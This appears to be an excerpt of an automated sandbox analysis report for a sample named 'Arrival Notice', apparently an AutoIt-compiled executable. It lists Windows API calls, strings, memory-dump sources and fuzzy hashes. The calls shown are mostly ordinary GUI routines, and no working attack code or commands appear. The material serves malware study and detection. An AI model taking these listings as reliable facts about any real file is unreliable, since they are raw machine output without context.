                                              • Instruction Fuzzy Hash: 5F02F130118301AFE715CF26C859BAABBE9FF49316F048A2DFC95D62A1C734D948DB52
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 0095AB99
                                              • SetTextColor.GDI32(?,?), ref: 0095AB9D
                                              • GetSysColorBrush.USER32(0000000F), ref: 0095ABB3
                                              • GetSysColor.USER32(0000000F), ref: 0095ABBE
                                              • CreateSolidBrush.GDI32(?), ref: 0095ABC3
                                              • GetSysColor.USER32(00000011), ref: 0095ABDB
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0095ABE9
                                              • SelectObject.GDI32(?,00000000), ref: 0095ABFA
                                              • SetBkColor.GDI32(?,00000000), ref: 0095AC03
                                              • SelectObject.GDI32(?,?), ref: 0095AC10
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0095AC2F
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0095AC46
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0095AC5B
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0095ACA7
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0095ACCE
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0095ACEC
                                              • DrawFocusRect.USER32(?,?), ref: 0095ACF7
                                              • GetSysColor.USER32(00000011), ref: 0095AD05
                                              • SetTextColor.GDI32(?,00000000), ref: 0095AD0D
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0095AD21
                                              • SelectObject.GDI32(?,0095A869), ref: 0095AD38
                                              • DeleteObject.GDI32(?), ref: 0095AD43
                                              • SelectObject.GDI32(?,?), ref: 0095AD49
                                              • DeleteObject.GDI32(?), ref: 0095AD4E
                                              • SetTextColor.GDI32(?,?), ref: 0095AD54
                                              • SetBkColor.GDI32(?,?), ref: 0095AD5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID:
                                              • API String ID: 1996641542-0
                                              • Opcode ID: 181eec5b9e26dbb81e79a2c764ac20064bdc2452be6ce428c5ad75edbc7ebff4
                                              • Instruction ID: b3833a80cb817223c5a85b8f6b63534b056184bc0ab89a9ad6c3b018fea8afa4
                                              • Opcode Fuzzy Hash: 181eec5b9e26dbb81e79a2c764ac20064bdc2452be6ce428c5ad75edbc7ebff4
                                              • Instruction Fuzzy Hash: 8C616C71904218EFDF11DFAADC48EAE7BB9EB08332F104225F915AB2A1D6759940DB90
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00958D34
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00958D45
                                              • CharNextW.USER32(0000014E), ref: 00958D74
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00958DB5
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00958DCB
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00958DDC
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00958DF9
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00958E45
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00958E5B
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00958E8C
                                              • _memset.LIBCMT ref: 00958EB1
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00958EFA
                                              • _memset.LIBCMT ref: 00958F59
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00958F83
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00958FDB
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00959088
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 009590AA
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009590F4
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00959121
                                              • DrawMenuBar.USER32(?), ref: 00959130
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00959158
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0
                                              • API String ID: 1073566785-4108050209
                                              • Opcode ID: f7a1d2c28e5007e8421f5ac6e5426a86f207d6d69403f8b0020d01ed0f094de6
                                              • Instruction ID: 732caf5ba85c43e1ad41390708ab91a5d2b5e91e0d09f95d7caec8c874384ead
                                              • Opcode Fuzzy Hash: f7a1d2c28e5007e8421f5ac6e5426a86f207d6d69403f8b0020d01ed0f094de6
                                              • Instruction Fuzzy Hash: 66E1A070905219AADF20DF66CC88EEF7BB9EF05311F008159FD15AA291DB348A89DF60
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00954C51
                                              • GetDesktopWindow.USER32 ref: 00954C66
                                              • GetWindowRect.USER32(00000000), ref: 00954C6D
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00954CCF
                                              • DestroyWindow.USER32(?), ref: 00954CFB
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00954D24
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00954D42
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00954D68
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00954D7D
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00954D90
                                              • IsWindowVisible.USER32(?), ref: 00954DB0
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00954DCB
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00954DDF
                                              • GetWindowRect.USER32(?,?), ref: 00954DF7
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00954E1D
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00954E37
                                              • CopyRect.USER32(?,?), ref: 00954E4E
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00954EB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: 3dce3b85487e1454baff78f379e64273d4c39a1a24bbc8af92f2a40ab31e6435
                                              • Instruction ID: d9c4f25edf634ffadafb2ab9057b5922c9d1c056e189e4cd36d88db2b118e51f
                                              • Opcode Fuzzy Hash: 3dce3b85487e1454baff78f379e64273d4c39a1a24bbc8af92f2a40ab31e6435
                                              • Instruction Fuzzy Hash: 72B19E71618341AFDB44DF26C849B6ABBE4FF84315F008A1DF9999B2A1D770EC48CB52
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009346E8
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0093470E
                                              • _wcscpy.LIBCMT ref: 0093473C
                                              • _wcscmp.LIBCMT ref: 00934747
                                              • _wcscat.LIBCMT ref: 0093475D
                                              • _wcsstr.LIBCMT ref: 00934768
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00934784
                                              • _wcscat.LIBCMT ref: 009347CD
                                              • _wcscat.LIBCMT ref: 009347D4
                                              • _wcsncpy.LIBCMT ref: 009347FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: f3dd0b718c492bf182b6e3a54f33d12e185ad28569130784e2110a1575234623
                                              • Instruction ID: b753a199a91b13c1b1af369062cc9986b37228c5d64e1387a6441fcbcc57a7b8
                                              • Opcode Fuzzy Hash: f3dd0b718c492bf182b6e3a54f33d12e185ad28569130784e2110a1575234623
                                              • Instruction Fuzzy Hash: B7412D716042087ADB10F7798C47EBF77ACEF45720F140166FA05E6182EF74AA015BA7
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D28BC
                                              • GetSystemMetrics.USER32(00000007), ref: 008D28C4
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008D28EF
                                              • GetSystemMetrics.USER32(00000008), ref: 008D28F7
                                              • GetSystemMetrics.USER32(00000004), ref: 008D291C
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008D2939
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008D2949
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008D297C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008D2990
                                              • GetClientRect.USER32(00000000,000000FF), ref: 008D29AE
                                              • GetStockObject.GDI32(00000011), ref: 008D29CA
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008D29D5
                                                • Part of subcall function 008D2344: GetCursorPos.USER32(?), ref: 008D2357
                                                • Part of subcall function 008D2344: ScreenToClient.USER32(009967B0,?), ref: 008D2374
                                                • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000001), ref: 008D2399
                                                • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000002), ref: 008D23A7
                                              • SetTimer.USER32(00000000,00000000,00000028,008D1256), ref: 008D29FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: f6d3b1c765bd7d123ca3e8f7f8d5f41acf03750adb0e490c65bbe03e054d9bdf
                                              • Instruction ID: 4acf832e4b44fc9ed255f9750d10602053c5b2a05c8b60ab50245472e80a560c
                                              • Opcode Fuzzy Hash: f6d3b1c765bd7d123ca3e8f7f8d5f41acf03750adb0e490c65bbe03e054d9bdf
                                              • Instruction Fuzzy Hash: A9B1AD70A1420AEFDB14DFA9CC55BAE7BB4FB18315F10822AFA15E72D0DB30A841DB50
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 009540F6
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009541B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 3974292440-719923060
                                              • Opcode ID: cf3093af5bced55a50037e255ab2e33be540ded6497de3dc3b8e5713423d3622
                                              • Instruction ID: be40cf9ed67d5b3cf2dbc72525da9a72049fc062469ba30b41e4e638a32adef6
                                              • Opcode Fuzzy Hash: cf3093af5bced55a50037e255ab2e33be540ded6497de3dc3b8e5713423d3622
                                              • Instruction Fuzzy Hash: D8A1D1302143159FCB14FF25C951A6AB3E5FF84319F144A29F8A69B3A2DB34EC49CB52
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00945309
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00945314
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0094531F
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 0094532A
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00945335
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00945340
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0094534B
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00945356
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00945361
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0094536C
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00945377
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00945382
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0094538D
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00945398
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 009453A3
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 009453AE
                                              • GetCursorInfo.USER32(?), ref: 009453BE
                                              • GetLastError.KERNEL32(00000001,00000000), ref: 009453E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$ErrorInfoLast
                                              • String ID:
                                              • API String ID: 3215588206-0
                                              • Opcode ID: 163f7eb3d468be947c5ef46d525a91f0046817df36641b17e2b36d0cab5e8113
                                              • Instruction ID: 67f0fff8d178dad98fcd44aa0ef0b58ee516ee17cb7a084a7ffe71f7c2ac3f2b
                                              • Opcode Fuzzy Hash: 163f7eb3d468be947c5ef46d525a91f0046817df36641b17e2b36d0cab5e8113
                                              • Instruction Fuzzy Hash: 53415370E083196BDB109FBA8C49D6EFFB8EF51B50B10452BE509E7291DAB89401CE61
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0092AAA5
                                              • __swprintf.LIBCMT ref: 0092AB46
                                              • _wcscmp.LIBCMT ref: 0092AB59
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0092ABAE
                                              • _wcscmp.LIBCMT ref: 0092ABEA
                                              • GetClassNameW.USER32(?,?,00000400), ref: 0092AC21
                                              • GetDlgCtrlID.USER32(?), ref: 0092AC73
                                              • GetWindowRect.USER32(?,?), ref: 0092ACA9
                                              • GetParent.USER32(?), ref: 0092ACC7
                                              • ScreenToClient.USER32(00000000), ref: 0092ACCE
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0092AD48
                                              • _wcscmp.LIBCMT ref: 0092AD5C
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0092AD82
                                              • _wcscmp.LIBCMT ref: 0092AD96
                                                • Part of subcall function 008F386C: _iswctype.LIBCMT ref: 008F3874
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: de095ad93c8ee894d1bbaad6d04f45f1706180af5e3919dc47c880c664c59643
                                              • Instruction ID: 25909872810f6ad264a32c1b5cfc6adb52945e00fecb3b5574b9cbe8ab5d5aff
                                              • Opcode Fuzzy Hash: de095ad93c8ee894d1bbaad6d04f45f1706180af5e3919dc47c880c664c59643
                                              • Instruction Fuzzy Hash: C5A1E072204726AFDB14EF24E884BAAF7ECFF44315F104629F999D2194DB30E945CB92
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0092B3DB
                                              • _wcscmp.LIBCMT ref: 0092B3EC
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0092B414
                                              • CharUpperBuffW.USER32(?,00000000), ref: 0092B431
                                              • _wcscmp.LIBCMT ref: 0092B44F
                                              • _wcsstr.LIBCMT ref: 0092B460
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0092B498
                                              • _wcscmp.LIBCMT ref: 0092B4A8
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0092B4CF
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0092B518
                                              • _wcscmp.LIBCMT ref: 0092B528
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0092B550
                                              • GetWindowRect.USER32(00000004,?), ref: 0092B5B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: 46d8ef9e0effaa56854ea83898d2f999b2b90f5f557b63d6169919597972b78d
                                              • Instruction ID: b5c92f45a5a59be1d9b3f221f40097d7daa4b500b02772e9492245d6785b9113
                                              • Opcode Fuzzy Hash: 46d8ef9e0effaa56854ea83898d2f999b2b90f5f557b63d6169919597972b78d
                                              • Instruction Fuzzy Hash: F081C0710083199BDB00DF14E885FAA7BECFF44324F18856AFD858A1AADB34DD45CBA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                              • API String ID: 1038674560-1810252412
                                              • Opcode ID: a81bc272aa114ac4817bec8690d870d2ef51ca302d2948c85c61cd8a5eda51f0
                                              • Instruction ID: 349b10a32f76477bc0ba07e59d61b1e32ff5a229b56d0547e2c650c75660292d
                                              • Opcode Fuzzy Hash: a81bc272aa114ac4817bec8690d870d2ef51ca302d2948c85c61cd8a5eda51f0
                                              • Instruction Fuzzy Hash: BF31E331544329E6DB14FA64DD43EFE77A8FF20754F64051AB412B12D9FF116E04C652
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 0092C4D4
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0092C4E6
                                              • SetWindowTextW.USER32(?,?), ref: 0092C4FD
                                              • GetDlgItem.USER32(?,000003EA), ref: 0092C512
                                              • SetWindowTextW.USER32(00000000,?), ref: 0092C518
                                              • GetDlgItem.USER32(?,000003E9), ref: 0092C528
                                              • SetWindowTextW.USER32(00000000,?), ref: 0092C52E
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0092C54F
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0092C569
                                              • GetWindowRect.USER32(?,?), ref: 0092C572
                                              • SetWindowTextW.USER32(?,?), ref: 0092C5DD
                                              • GetDesktopWindow.USER32 ref: 0092C5E3
                                              • GetWindowRect.USER32(00000000), ref: 0092C5EA
                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0092C636
                                              • GetClientRect.USER32(?,?), ref: 0092C643
                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0092C668
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0092C693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                              • String ID:
                                              • API String ID: 3869813825-0
                                              • Opcode ID: dce078018822b6618a0aeaf17117d98aec2f7c44c30151ed41b57390684ffb7b
                                              • Instruction ID: edfbd3059b8f99149ec76eec8de9216169a7772d8e7e9c342b3ea8320f936587
                                              • Opcode Fuzzy Hash: dce078018822b6618a0aeaf17117d98aec2f7c44c30151ed41b57390684ffb7b
                                              • Instruction Fuzzy Hash: E8517A71900709AFDB209FA9DE89F6FBBF9FF04705F004928E686A25A4C775E904DB50
                                              APIs
                                              • _memset.LIBCMT ref: 0095A4C8
                                              • DestroyWindow.USER32(?,?), ref: 0095A542
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0095A5BC
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0095A5DE
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095A5F1
                                              • DestroyWindow.USER32(00000000), ref: 0095A613
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008D0000,00000000), ref: 0095A64A
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0095A663
                                              • GetDesktopWindow.USER32 ref: 0095A67C
                                              • GetWindowRect.USER32(00000000), ref: 0095A683
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0095A69B
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0095A6B3
                                                • Part of subcall function 008D25DB: GetWindowLongW.USER32(?,000000EB), ref: 008D25EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
